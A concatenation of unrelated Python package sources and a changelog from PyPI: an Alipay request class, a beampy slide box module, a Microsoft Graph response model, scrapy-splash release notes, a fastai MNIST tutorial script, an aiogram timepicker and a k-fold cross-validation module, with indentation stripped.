@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'koubei.sales.kbasset.stuff.produceorder.batchquery'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
|
PypiClean
|
/beampy_slideshow-0.5.5.post3-py3-none-any.whl/beampy/modules/box.py
|
from beampy.document import document
from beampy.functions import set_curentslide, set_lastslide
from beampy.modules.core import group
from beampy.modules.text import text
from beampy.modules.svg import rectangle
from beampy.geometry import center
import logging
class box(group):
"""
Draw a box around a group.
Parameters
----------
title : str or None, optional
The title of the box (the default value is None, which implies
no title).
x : int or float or {'center', 'auto'} or str, optional
Horizontal position for the group (the default is 'center'). See
positioning system of Beampy.
y : int or float or {'center', 'auto'} or str, optional
Vertical position for the group (the default is 'auto'). See
positioning system of Beampy.
width : int or float or None, optional
Width of the group (the default is None, which implies that the width
is computed to fit the group contents width).
height : int or float or None, optional
Height of the group (the default is None). When height is None the
height is computed to fit the group contents height.
perentid : str or None, optional
Beampy id of the parent group (the default is None). This parentid is
given automatically by Beampy render.
rounded : int, optional
The number of pixel for rounded borders (the default value is
10).
linewidth : int, optional
The linewidth of the border in pt (the default value is 1).
color : svg color name as string, optional
The color of the contour line of the box (the default value is
'red').
head_height : int or None, optional
The height in pixel of the background under the title (the
default is None, which implies that height is computed from
title height + 10px of margins). You need to adjust this value
for multi-lines titles.
shadow : boolean, optional
Draw a shadow under the box (the default value is False, which
means no shadow).
background_color : svg color name as string, optional
The color of the background of the box (the default values is
'white').
title_color : svg color name as string, optional
The color of the title (the default value is 'white').
title_align : {'left','right','center'}, optional
The horizontal alignment of the title (the default value is
'left').
title_xoffset : int, optional
The horizontal offset in pixel from the box border of the
title (the default value is 10).
title_size : int, optional
The size of the box title font (the default theme set this
value the size of main text).
title_background_color: svg color name as string, optional
The color of the background below the title (The default theme
set this to the same color as the contour line).
title_height_margin: int, optional
Set the space between the bottom and the top of the title (the default theme sets this value to 10)
auto_height_margin : int, optional
The vertical margin in pixel (top and bottom) to use when box height is not specified
(the default theme sets this value to 15).
"""
def __init__(self, title=None, x='center', y='auto', width=None,
height=None, parentid=None, **kwargs):
self.title = title
self.check_args_from_theme(kwargs)
super(box, self).__init__(x=x,
y=y,
width=width,
height=height,
parentid=parentid,
opengroup=False)
# Build the title if it's not None
self.bp_title = None # to store beampy text object for the title
if self.title is not None:
# Title should not be in group
self.build_title()
self.yoffset = self.head_height
def build_title(self):
self.title_xpos = self.title_xoffset
self.title_ypos = self.title_height_margin/2
self.bp_title = text(self.title, x=self.title_xpos,
y=self.title_ypos, color=self.title_color,
width=self.width-20, size=self.title_size)
# Add y offset to the group (the height taken by the title)
if self.head_height is None:
self.head_height = (self.bp_title.height + self.title_height_margin).value
# print(self.height, self.width)
# self.remove_element_in_group(self.bp_title.id)
# self.bp_title = None
def build_background(self):
if self.shadow:
self.svg_shadow = '#drop-shadow'
else:
self.svg_shadow = None
self.main_svg = rectangle(width=self.width,
height=self.height,
rx=self.rounded,
ry=self.rounded,
edgecolor=self.color,
linewidth=self.linewidth,
color=self.background_color,
svgfilter=self.svg_shadow,
x=self.center+center(0),
y=self.center+center(0))
if self.svg_shadow is not None:
self.main_svg.add_svgdef('''
<filter id="drop-shadow"> <feGaussianBlur in="SourceAlpha"
stdDeviation="3"/> <feOffset dx="4" dy="4" result="offsetblur"/>
<feMerge> <feMergeNode/> <feMergeNode in="SourceGraphic"/> </feMerge>
</filter>
''')
if self.bp_title is not None:
clipid = "#boxborder_{id}".format(id=self.id)
self.title_svg = rectangle(width=self.width,
height=self.head_height,
color=self.color,
edgecolor=self.color,
linewidth=self.linewidth,
svgclip=clipid,
x="-%ipx"%(self.linewidth/2),
y="-%ipx"%(self.linewidth/2))
self.title_svg.rounded = self.rounded
self.title_svg.add_svgdef('''
<clipPath id="boxborder_%s">
<rect width="{width}" height="{clipheight}"
rx="{rounded}" ry="{rounded}" stroke="{color}"
stroke-width="{linewidth}"/>
</clipPath>
''' % self.id, ['width', 'clipheight', 'rounded',
'color', 'linewidth'])
# Added to clip the title square
self.title_svg.clipheight = self.head_height * 2
def pre_render(self):
set_curentslide(self.slide_id)
if self.init_height is None:
for eid in self.elementsid:
elem = document._slides[self.slide_id].contents[eid]
if elem.height.value is None:
elem.height.run_render()
if elem.width.value is None:
elem.width.run_render()
self.compute_group_size()
self.update_size(self.width, self.height+self.yoffset +
2*self.auto_height_margin)
# Report offset on auto placed elements
for eid in self.elementsid:
document._slides[self.slide_id].contents[eid].positionner.y['final'] += self.yoffset + self.auto_height_margin
else:
# The case of the height is given and elements have a
# fixed shift, weed need to update the shift with the
# title yoffset TODO: This should be included in the group
# class !!!
for eid in self.elementsid:
elemp = document._slides[self.slide_id].contents[eid].positionner
if elemp.y['align'] not in ['auto', 'center'] and elemp.y['reference'] != 'relative':
document._slides[self.slide_id].contents[eid].positionner.y['shift'] += self.yoffset
# Create the backgroud objects
with self:
self.build_background()
# Propagate the layer inside the group
# (as we added element in render time)
self.propagate_layers()
# Manage position of new objects
self.main_svg.first()
# Replace the title of the box
if self.bp_title is not None:
self.title_svg.above(self.main_svg)
# Set the correct layers for the title
logging.debug('set layer to box title to %s ' % str(self.layers))
self.bp_title.layers = self.layers
title_xpos = self.left + self.title_xoffset
if self.title_align == 'center':
title_xpos = self.left + (self.title_svg.width-self.bp_title.width)/2
if self.title_align == 'right':
title_xpos = self.right - (self.bp_title.width + self.title_xpos)
self.bp_title.positionner.update_y(self.top + self.title_ypos)
self.bp_title.positionner.update_x(title_xpos)
set_lastslide()
|
PypiClean
|
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/models/search/acronym_collection_response.py
|
from __future__ import annotations
from kiota_abstractions.serialization import Parsable, ParseNode, SerializationWriter
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from . import acronym
from .. import base_collection_pagination_count_response
from .. import base_collection_pagination_count_response
class AcronymCollectionResponse(base_collection_pagination_count_response.BaseCollectionPaginationCountResponse):
def __init__(self,) -> None:
"""
Instantiates a new AcronymCollectionResponse and sets the default values.
"""
super().__init__()
# The value property
self._value: Optional[List[acronym.Acronym]] = None
@staticmethod
def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> AcronymCollectionResponse:
"""
Creates a new instance of the appropriate class based on discriminator value
Args:
parseNode: The parse node to use to read the discriminator value and create the object
Returns: AcronymCollectionResponse
"""
if parse_node is None:
raise Exception("parse_node cannot be undefined")
return AcronymCollectionResponse()
def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:
"""
The deserialization information for the current model
Returns: Dict[str, Callable[[ParseNode], None]]
"""
from . import acronym
from .. import base_collection_pagination_count_response
fields: Dict[str, Callable[[Any], None]] = {
"value": lambda n : setattr(self, 'value', n.get_collection_of_object_values(acronym.Acronym)),
}
super_fields = super().get_field_deserializers()
fields.update(super_fields)
return fields
def serialize(self,writer: SerializationWriter) -> None:
"""
Serializes information the current object
Args:
writer: Serialization writer to use to serialize this model
"""
if writer is None:
raise Exception("writer cannot be undefined")
super().serialize(writer)
writer.write_collection_of_object_values("value", self.value)
@property
def value(self,) -> Optional[List[acronym.Acronym]]:
"""
Gets the value property value. The value property
Returns: Optional[List[acronym.Acronym]]
"""
return self._value
@value.setter
def value(self,value: Optional[List[acronym.Acronym]] = None) -> None:
"""
Sets the value property value. The value property
Args:
value: Value to set for the value property.
"""
self._value = value
|
PypiClean
|
/scrapy-splash-0.9.0.tar.gz/scrapy-splash-0.9.0/CHANGES.rst
|
Changes
=======
0.9.0 (2023-02-03)
------------------
* Removed official support for Python 2.7, 3.4, 3.5 and 3.6, and added official
support for Python 3.9, 3.10 and 3.11.
* Deprecated ``SplashJsonResponse.body_as_unicode()``, to be replaced by
``SplashJsonResponse.text``.
* Removed calls to obsolete ``to_native_str``, removed in Scrapy 2.8.
0.8.0 (2021-10-05)
------------------
* **Security bug fix:**
If you use HttpAuthMiddleware_ (i.e. the ``http_user`` and ``http_pass``
spider attributes) for Splash authentication, any non-Splash request will
expose your credentials to the request target. This includes ``robots.txt``
requests sent by Scrapy when the ``ROBOTSTXT_OBEY`` setting is set to
``True``.
Use the new ``SPLASH_USER`` and ``SPLASH_PASS`` settings instead to set
your Splash authentication credentials safely.
.. _HttpAuthMiddleware: http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth
* Responses now expose the HTTP status code and headers from Splash as
``response.splash_response_status`` and
``response.splash_response_headers`` (#158)
* The ``meta`` argument passed to the ``scrapy_splash.request.SplashRequest``
constructor is no longer modified (#164)
* Website responses with 400 or 498 as HTTP status code are no longer
handled as the equivalent Splash responses (#158)
* Cookies are no longer sent to Splash itself (#156)
* ``scrapy_splash.utils.dict_hash`` now also works with ``obj=None``
(``225793b``)
* Our test suite now includes integration tests (#156) and tests can be run
in parallel (``6fb8c41``)
* There’s a new ‘Getting help’ section in the ``README.rst`` file (#161,
#162), the documentation about ``SPLASH_SLOT_POLICY`` has been improved
(#157) and a typo as been fixed (#121)
* Made some internal improvements (``ee5000d``, ``25de545``, ``2aaa79d``)
0.7.2 (2017-03-30)
------------------
* fixed issue with response type detection.
0.7.1 (2016-12-20)
------------------
* Scrapy 1.0.x support is back;
* README updates.
0.7 (2016-05-16)
----------------
* ``SPLASH_COOKIES_DEBUG`` setting allows to log cookies
sent and received to/from Splash in ``cookies`` request/response fields.
It is similar to Scrapy's builtin ``COOKIES_DEBUG``, but works for
Splash requests;
* README cleanup.
0.6.1 (2016-04-29)
------------------
* Warning about HTTP methods is no longer logged for non-Splash requests.
0.6 (2016-04-20)
----------------
* ``SplashAwareDupeFilter`` and ``splash_request_fingerprint`` are improved:
they now canonicalize URLs and take URL fragments in account;
* ``cache_args`` value fingerprints are now calculated faster.
0.5 (2016-04-18)
----------------
* ``cache_args`` SplashRequest argument and
``request.meta['splash']['cache_args']`` key allow to save network traffic
and disk storage by not storing duplicate Splash arguments in disk request
queues and not sending them to Splash multiple times. This feature requires
Splash 2.1+.
To upgrade from v0.4 enable ``SplashDeduplicateArgsMiddleware`` in settings.py::
SPIDER_MIDDLEWARES = {
'scrapy_splash.SplashDeduplicateArgsMiddleware': 100,
}
0.4 (2016-04-14)
----------------
* SplashFormRequest class is added; it is a variant of FormRequest which uses
Splash;
* Splash parameters are no longer stored in request.meta twice; this change
should decrease disk queues data size;
* SplashMiddleware now increases request priority when rescheduling the request;
this should decrease disk queue data size and help with stale cookie
problems.
0.3 (2016-04-11)
----------------
Package is renamed from ``scrapyjs`` to ``scrapy-splash``.
An easiest way to upgrade is to replace ``scrapyjs`` imports with
``scrapy_splash`` and update ``settings.py`` with new defaults
(check the README).
There are many new helpers to handle JavaScript rendering transparently;
the recommended way is now to use ``scrapy_splash.SplashRequest`` instead
of ``request.meta['splash']``. Please make sure to read the README if
you're upgrading from scrapyjs - you may be able to drop some code from your
project, especially if you want to access response html, handle cookies
and headers.
* new SplashRequest class; it can be used as a replacement for scrapy.Request
to provide a better integration with Splash;
* added support for POST requests;
* SplashResponse, SplashTextResponse and SplashJsonResponse allow to
handle Splash responses transparently, taking care of response.url,
response.body, response.headers and response.status. SplashJsonResponse
allows to access decoded response JSON data as ``response.data``.
* cookie handling improvements: it is possible to handle Scrapy and Splash
cookies transparently; current cookiejar is exposed as response.cookiejar;
* headers are passed to Splash by default;
* URLs with fragments are handled automatically when using SplashRequest;
* logging is improved: ``SplashRequest.__repr__`` shows both requested URL
and Splash URL;
* in case of Splash HTTP 400 errors the response is logged by default;
* an issue with dupefilters is fixed: previously the order of keys in
JSON request body could vary, making requests appear as non-duplicates;
* it is now possible to pass custom headers to Splash server itself;
* test coverage reports are enabled.
0.2 (2016-03-26)
----------------
* Scrapy 1.0 and 1.1 support;
* Python 3 support;
* documentation improvements;
* project is moved to https://github.com/scrapy-plugins/scrapy-splash.
0.1.1 (2015-03-16)
------------------
Fixed fingerprint calculation for non-string meta values.
0.1 (2015-02-28)
----------------
Initial release
|
PypiClean
|
/kaggle_runner-0.2.1-py3-none-any.whl/hub/beginners-guide-to-mnist-with-fast-ai.py
|
import warnings
warnings.simplefilter('ignore')
from fastai import *
from fastai.vision import *
from fastai.vision import get_transforms
import os
from pathlib import Path
import pandas as pd
INPUT = Path("../input/digit-recognizer")
os.listdir(INPUT)
train_df = pd.read_csv(INPUT/"train.csv")
test_df = pd.read_csv(INPUT/"test.csv")
TRAIN = Path("../train")
TEST = Path("../test")
for index in range(10):
try:
os.makedirs(TRAIN/str(index))
except:
pass
sorted(os.listdir(TRAIN))
try:
os.makedirs(TEST)
except:
pass
from PIL import Image
def saveDigit(digit, filepath):
digit = digit.reshape(28,28)
digit = digit.astype(np.uint8)
img = Image.fromarray(digit)
img.save(filepath)
for index, row in train_df.iterrows():
label,digit = row[0], row[1:]
folder = TRAIN/str(label)
filename = f"{index}.jpg"
filepath = folder/filename
digit = digit.values
saveDigit(digit, filepath)
for index, digit in test_df.iterrows():
folder = TEST
filename = f"{index}.jpg"
filepath = folder/filename
digit = digit.values
saveDigit(digit, filepath)
import matplotlib.pyplot as plt
def displayTrainingData():
fig = plt.figure(figsize=(5,10))
for rowIndex in range(1, 10):
subdirectory = str(rowIndex)
path = TRAIN/subdirectory
images = os.listdir(path)
for sampleIndex in range(1, 6):
randomNumber = random.randint(0, len(images)-1)
image = Image.open(path/images[randomNumber])
ax = fig.add_subplot(10, 5, 5*rowIndex + sampleIndex)
ax.axis("off")
plt.imshow(image, cmap='gray')
plt.show()
def displayTestingData():
fig = plt.figure(figsize=(5, 10))
paths = os.listdir(TEST)
for i in range(1, 51):
randomNumber = random.randint(0, len(paths)-1)
image = Image.open(TEST/paths[randomNumber])
ax = fig.add_subplot(10, 5, i)
ax.axis("off")
plt.imshow(image, cmap='gray')
plt.show()
print('samples of training data')
displayTrainingData()
print('samples of testing data')
displayTestingData()
image_path = TEST/os.listdir(TEST)[9]
image = Image.open(image_path)
image_array = np.asarray(image)
#fig, ax = plt.subplots(figsize=(15, 15))
#img = ax.imshow(image_array, cmap='gray')
#for x in range(28):
# for y in range(28):
# value = round(image_array[y][x]/255.0, 2)
# color = 'black' if value > 0.5 else 'white'
# ax.annotate(s=value, xy=(x, y), ha='center', va='center', color=color)
#
#plt.axis('off')
#plt.show()
tfms = get_transforms(do_flip=False)
data = ImageDataBunch.from_folder(
path = str(TRAIN),
test = str(TEST),
valid_pct = 0.2,
bs = 16,
size = 28,
#num_workers = 0,
ds_tfms = tfms
)
print(mnist_stats)
data.normalize(mnist_stats)
print(data.classes)
learn = cnn_learner(data, base_arch=models.resnet18, metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
learn.fit_one_cycle(cyc_len=5)
interp = ClassificationInterpretation.from_learner(learn)
interp.plot_top_losses(9, figsize=(7, 7))
interp.plot_confusion_matrix()
import platform; platform.system()
flip_tfm = RandTransform(tfm=TfmPixel (flip_lr), kwargs={}, p=1, resolved={}, do_run=True, is_random=True, use_on_y=True)
folder = TRAIN/"3"
filename = os.listdir(folder)[0]
img = open_image(TRAIN/folder/filename)
display(img)
display(img.apply_tfms(flip_tfm))
tfms = get_transforms(do_flip=False)
learn = cnn_learner(data, base_arch=models.densenet169, metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
learn = cnn_learner(data, base_arch=models.densenet169, pretrained=False, metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
import torchvision.models
learn = Learner(data, torchvision.models.googlenet(), metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
learn = Learner(data, torchvision.models.googlenet(pretrained=True), metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
# here you instantiate all the layers of the neural network and the activation function
def forward(self, x):
# here you define the forward propagation
return x
batch_size = 16
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
# input is 28 pixels x 28 pixels x 3 channels
# our original data was grayscale, so only one channel, but fast.ai automatically loads in the data as RGB
self.conv1 = nn.Conv2d(3,16, 3, padding=1)
self.conv2 = nn.Conv2d(16,32, 3, padding=1)
self.pool = nn.MaxPool2d(2, 2)
self.fc1 = nn.Linear(7*7*32, 500)
self.fc2 = nn.Linear(500, 10)
self.relu = nn.ReLU()
def forward(self, x):
print (x.size())
# x (28x28x3)
x = self.conv1(x)
# x (28x28x16)
x = self.pool(x)
# x (14x14x16)
x = self.relu(x)
x = self.conv2(x)
# x (14x14x32)
x = self.pool(x)
# x (7x7x32)
x = self.relu(x)
# flatten images in batch
print(x.size())
x = x.view(-1,7*7*32)
print(x.size())
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
x = self.relu(x)
return x
learn = Learner(data, CNN(), metrics=accuracy, model_dir="/tmp/models", callback_fns=ShowGraph)
|
PypiClean
|
/aiogram_timepicker-0.2.0-py3-none-any.whl/aiogram_timepicker/clock/single/c24_ts3/timepicker.py
|
from aiogram.types import CallbackQuery
from aiogram.utils.callback_data import CallbackData
from aiogram_timepicker import utils as lib_utils
from aiogram_timepicker.result import Result
from ..base import BaseTimePicker
from . import timepicker_callback, _default, utils
class TimePicker(BaseTimePicker):
def __init__(self, callback: CallbackData = timepicker_callback, **kwargs):
super().__init__(callback, **kwargs)
self.label_empty = _default['empty']
self.label_center = _default['center']
self.label_select = _default['select']
self.label_cancel = _default['cancel']
self.time_format = _default['time_format']
self.time_current_format = _default['time_current_format']
self.functions = lib_utils.Functions(
utils.default_create_time_button,
utils.default_insert_time_button,
None,
None,
utils.default_create_cancel_button,
utils.default_insert_cancel_button,
utils.default_create_back_button,
utils.default_insert_back_button,
create_select=utils.default_create_select_button,
insert_select=utils.default_insert_select_button,
)
self.kwargs_params(**kwargs)
def kwargs_params(self, **kwargs):
self.label_empty = kwargs.get('label_empty', self.label_empty or _default['empty'])
self.label_select = kwargs.get('label_select', self.label_select or _default['select'])
self.label_cancel = kwargs.get('label_cancel', self.label_cancel or _default['cancel'])
if 'time_format' in kwargs:
self.time_format = kwargs.get('time_format') or _default.get('time_format')
if 'time_current_format' in kwargs:
self.time_current_format = kwargs.get('time_current_format') or _default.get('time_current_format')
async def process_selection(self, query: CallbackQuery, data: CallbackData) -> Result:
"""
Process the callback_query. This method generates a new time picker if forward or
backward is pressed. This method should be called inside a CallbackQueryHandler.
:param query: callback_query, as provided by the CallbackQueryHandler
:param data: callback_data, dictionary, set by `self.callback` (default timepicker_callback)
:return: Returns an aiogram_timepicker.result.Result object.
"""
r = await super().process_selection(query, data)
r.hours = r.seconds
r.seconds = 0
r.editable = False
return r
|
PypiClean
|
/cimcb_lite-1.0.2.tar.gz/cimcb_lite-1.0.2/cimcb_lite/cross_val/kfold.py
|
import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from bokeh.layouts import gridplot
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource
from bokeh.models import Circle, HoverTool, TapTool, LabelSet
from tqdm import tqdm
from bokeh.plotting import output_notebook, show
from .BaseCrossVal import BaseCrossVal
from ..utils import binary_metrics
class kfold(BaseCrossVal):
""" Exhaustitive search over param_dict calculating binary metrics.
Parameters
----------
model : object
This object is assumed to store bootlist attributes in .model (e.g. modelPLS.model.x_scores_).
X : array-like, shape = [n_samples, n_features]
Predictor variables, where n_samples is the number of samples and n_features is the number of predictors.
Y : array-like, shape = [n_samples, 1]
Response variables, where n_samples is the number of samples.
param_dict : dict
List of attributes to calculate and return bootstrap confidence intervals.
folds: : a positive integer, (default 10)
The number of folds used in the computation.
bootnum : a positive integer, (default 100)
The number of bootstrap samples used in the computation for the plot.
Methods
-------
Run: Runs all necessary methods prior to plot.
Plot: Creates a R2/Q2 plot.
"""
def __init__(self, model, X, Y, param_dict, folds=10, bootnum=100):
super().__init__(model=model, X=X, Y=Y, param_dict=param_dict, folds=folds, bootnum=bootnum)
self.crossval_idx = StratifiedKFold(n_splits=folds)
def calc_ypred(self):
"""Calculates ypred full and ypred cv."""
self.ypred_full = []
self.ypred_cv = []
for params in self.param_list:
# Set hyper-parameters
params_i = params
model_i = self.model(**params_i)
# Full
model_i.train(self.X, self.Y)
ypred_full_i = model_i.test(self.X)
self.ypred_full.append(ypred_full_i)
# CV (for each fold)
ypred_cv_i = self._calc_cv_ypred(model_i, self.X, self.Y)
self.ypred_cv.append(ypred_cv_i)
def calc_stats(self):
"""Calculates binary statistics from ypred full and ypred cv."""
stats_list = []
for i in range(len(self.param_list)):
# Create dictionaries with binary_metrics
stats_full_i = binary_metrics(self.Y, self.ypred_full[i])
stats_cv_i = binary_metrics(self.Y, self.ypred_cv[i])
# Rename columns
stats_full_i = {k + "full": v for k, v in stats_full_i.items()}
stats_cv_i = {k + "cv": v for k, v in stats_cv_i.items()}
stats_cv_i["R²"] = stats_full_i.pop("R²full")
stats_cv_i["Q²"] = stats_cv_i.pop("R²cv")
# Combine and append
stats_combined = {**stats_full_i, **stats_cv_i}
stats_list.append(stats_combined)
self.table = self._format_table(stats_list) # Transpose, Add headers
return self.table
def run(self):
"""Runs all functions prior to plot."""
self.calc_ypred()
self.calc_stats()
if self.bootnum > 1:
self.calc_ypred_boot()
self.calc_stats_boot()
def calc_ypred_boot(self):
"""Calculates ypred full and ypred cv for each bootstrap resample."""
self.ytrue_boot = []
self.ypred_full_boot = []
self.ypred_cv_boot = []
for i in tqdm(range(self.bootnum), desc="Kfold"):
bootidx_i = np.random.choice(len(self.Y), len(self.Y))
newX = self.X[bootidx_i, :]
newY = self.Y[bootidx_i]
ypred_full_nboot_i = []
ypred_cv_nboot_i = []
for params in self.param_list:
# Set hyper-parameters
model_i = self.model(**params)
# Full
model_i.train(newX, newY)
ypred_full_i = model_i.test(newX)
ypred_full_nboot_i.append(ypred_full_i)
# cv
ypred_cv_i = self._calc_cv_ypred(model_i, newX, newY)
ypred_cv_nboot_i.append(ypred_cv_i)
self.ytrue_boot.append(newY)
self.ypred_full_boot.append(ypred_full_nboot_i)
self.ypred_cv_boot.append(ypred_cv_nboot_i)
def calc_stats_boot(self):
"""Calculates binary statistics from ypred full and ypred cv for each bootstrap resample."""
self.full_boot_metrics = []
self.cv_boot_metrics = []
for i in range(len(self.param_list)):
stats_full_i = []
stats_cv_i = []
for j in range(self.bootnum):
stats_full = binary_metrics(self.ytrue_boot[j], self.ypred_full_boot[j][i])
stats_full_i.append(stats_full)
stats_cv = binary_metrics(self.ytrue_boot[j], self.ypred_cv_boot[j][i])
stats_cv_i.append(stats_cv)
self.full_boot_metrics.append(stats_full_i)
self.cv_boot_metrics.append(stats_cv_i)
def _calc_cv_ypred(self, model_i, X, Y):
"""Method used to calculate ypred cv."""
ypred_cv_i = [None] * len(Y)
for train, test in self.crossval_idx.split(self.X, self.Y):
X_train = X[train, :]
Y_train = Y[train]
X_test = X[test, :]
model_i.train(X_train, Y_train)
ypred_cv_i_j = model_i.test(X_test)
# Return value to y_pred_cv in the correct position # Better way to do this
for (idx, val) in zip(test, ypred_cv_i_j):
ypred_cv_i[idx] = val.tolist()
return ypred_cv_i
def _format_table(self, stats_list):
"""Make stats pretty (pandas table -> proper names in columns)."""
table = pd.DataFrame(stats_list).T
param_list_string = []
for i in range(len(self.param_list)):
param_list_string.append(str(self.param_list[i]))
table.columns = param_list_string
return table
def plot(self, metric="r2q2"):
"""Create a full/cv plot using based on metric selected.
Parameters
----------
metric : string, (default "r2q2")
metric has to be either "r2q2", "auc", "acc", "f1score", "prec", "sens", or "spec".
"""
# Choose metric to plot
metric_title = np.array(["ACCURACY", "AUC", "F1-SCORE", "PRECISION", "R²", "SENSITIVITY", "SPECIFICITY"])
metric_list = np.array(["acc", "auc", "f1score", "prec", "r2q2", "sens", "spec"])
metric_idx = np.where(metric_list == metric)[0][0]
# get full, cv, and diff
full = self.table.iloc[2 * metric_idx + 1]
cv = self.table.iloc[2 * metric_idx]
diff = abs(full - cv)
full_text = self.table.iloc[2 * metric_idx + 1].name
cv_text = self.table.iloc[2 * metric_idx].name
diff_text = "DIFFERENCE " + "(" + full_text + " - " + cv_text + ")"
# round full, cv, and diff for hovertool
full_hover = []
cv_hover = []
diff_hover = []
for j in range(len(full)):
full_hover.append("%.2f" % round(full[j], 2))
cv_hover.append("%.2f" % round(cv[j], 2))
diff_hover.append("%.2f" % round(diff[j], 2))
# get key, values (as string) from param_dict (key -> title, values -> x axis values)
for k, v in self.param_dict.items():
key = k
values = v
values_string = [str(i) for i in values]
# store data in ColumnDataSource for Bokeh
data = dict(full=full, cv=cv, diff=diff, full_hover=full_hover, cv_hover=cv_hover, diff_hover=diff_hover, values_string=values_string)
source = ColumnDataSource(data=data)
fig1_yrange = (min(diff) - max(0.1 * (min(diff)), 0.1), max(diff) + max(0.1 * (max(diff)), 0.1))
fig1_xrange = (min(cv) - max(0.1 * (min(cv)), 0.1), max(cv) + max(0.1 * (max(cv)), 0.1))
fig1_title = diff_text + " vs " + cv_text
# Figure 1 (DIFFERENCE (R2 - Q2) vs. Q2)
fig1 = figure(x_axis_label=cv_text, y_axis_label=diff_text, title=fig1_title, tools="tap,pan,wheel_zoom,box_zoom,reset,save,lasso_select,box_select", y_range=fig1_yrange, x_range=fig1_xrange, plot_width=485, plot_height=405)
# Figure 1: Add a line
fig1_line = fig1.line(cv, diff, line_width=2, line_color="black", line_alpha=0.25)
# Figure 1: Add circles (interactive click)
fig1_circ = fig1.circle("cv", "diff", size=17, alpha=0.7, color="green", source=source)
fig1_circ.selection_glyph = Circle(fill_color="green", line_width=2, line_color="black", fill_alpha=0.6)
fig1_circ.nonselection_glyph.fill_color = "green"
fig1_circ.nonselection_glyph.fill_alpha = 0.4
fig1_circ.nonselection_glyph.line_color = "white"
fig1_text = fig1.text(x="cv", y="diff", text="values_string", source=source, text_font_size="10pt", text_color="white", x_offset=-3.5, y_offset=7)
fig1_text.nonselection_glyph.text_color = "white"
fig1_text.nonselection_glyph.text_alpha = 0.6
# Figure 1: Add hovertool
fig1.add_tools(HoverTool(renderers=[fig1_circ], tooltips=[(full_text, "@full_hover"), (cv_text, "@cv_hover"), ("Diff", "@diff_hover")]))
# Figure 1: Extra formating
fig1.axis.major_label_text_font_size = "8pt"
if metric is "r2q2" or metric is "auc":
fig1.title.text_font_size = "12pt"
fig1.xaxis.axis_label_text_font_size = "10pt"
fig1.yaxis.axis_label_text_font_size = "10pt"
else:
fig1.title.text_font_size = "10pt"
fig1.xaxis.axis_label_text_font_size = "9pt"
fig1.yaxis.axis_label_text_font_size = "9pt"
# Figure 2: full/cv
fig2_title = full_text + " & " + cv_text + " vs no. of components"
fig2 = figure(x_axis_label="components", y_axis_label="Value", title=fig2_title, plot_width=485, plot_height=405, x_range=pd.unique(values_string), y_range=(0, 1.1), tools="pan,wheel_zoom,box_zoom,reset,save,lasso_select,box_select")
# Figure 2: add confidence intervals if bootnum > 1
if self.bootnum > 1:
lower_ci_full = []
upper_ci_full = []
lower_ci_cv = []
upper_ci_cv = []
# Get all upper, lower 95% CI (full/cv) for each specific n_component and append
for m in range(len(self.full_boot_metrics)):
full_boot = []
cv_boot = []
for k in range(len(self.full_boot_metrics[0])):
full_boot.append(self.full_boot_metrics[m][k][metric_title[metric_idx]])
cv_boot.append(self.cv_boot_metrics[m][k][metric_title[metric_idx]])
# Calculated percentile 95% CI and append
full_bias = np.mean(full_boot) - full[m]
cv_bias = np.mean(cv_boot) - cv[m]
lower_ci_full.append(np.percentile(full_boot, 2.5) - full_bias)
upper_ci_full.append(np.percentile(full_boot, 97.5) - full_bias)
lower_ci_cv.append(np.percentile(cv_boot, 2.5) - cv_bias)
upper_ci_cv.append(np.percentile(cv_boot, 97.5) - cv_bias)
# Plot as a patch
x_patch = np.hstack((values_string, values_string[::-1]))
y_patch_r2 = np.hstack((lower_ci_full, upper_ci_full[::-1]))
fig2.patch(x_patch, y_patch_r2, alpha=0.10, color="red")
y_patch_q2 = np.hstack((lower_ci_cv, upper_ci_cv[::-1]))
fig2.patch(x_patch, y_patch_q2, alpha=0.10, color="blue")
# Figure 2: add full
fig2_line_full = fig2.line(values_string, full, line_color="red", line_width=2)
fig2_circ_full = fig2.circle("values_string", "full", line_color="red", fill_color="white", fill_alpha=1, size=8, source=source, legend=full_text)
fig2_circ_full.selection_glyph = Circle(line_color="red", fill_color="white", line_width=2)
fig2_circ_full.nonselection_glyph.line_color = "red"
fig2_circ_full.nonselection_glyph.fill_color = "white"
fig2_circ_full.nonselection_glyph.line_alpha = 0.4
# Figure 2: add cv
fig2_line_cv = fig2.line(values_string, cv, line_color="blue", line_width=2)
